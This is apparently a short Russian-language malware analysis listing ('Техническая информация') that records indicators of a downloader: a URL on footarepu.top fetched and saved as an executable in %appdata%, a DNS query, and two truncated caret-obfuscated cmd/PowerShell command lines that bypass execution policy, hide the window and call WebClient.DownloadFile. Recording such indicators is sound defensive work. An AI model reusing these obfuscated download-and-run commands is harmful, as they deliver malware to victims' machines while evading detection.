Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^w^E^RS^hEL^l.^E^xE -E^X^E^C^UtIoNpOlicY bYpAS^S^ -^nop^RO^fi^l^E -wIn^dOws^TYle H^iDDEN ^(neW-^OBject ^S^Y^sTe^M^.nET.WEbC^lieNt^).^d^Ow^nloa^DF^i^l^e(^'http://footarepu.top/...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "PO^w^E^RS^hEL^l.^E^xE -E^X^E^C^UtIoNpOlicY bYpAS^S^ -^nop^RO^fi^l^E -wIn^dOws^TYle H^iDDEN ^(neW-^OBject ^S^Y^sTe^M^.nET.WEbC^lieNt^).^d^Ow^nloa^DF^i^l^e(^'http://footarepu.top/...' (со скрытым окном)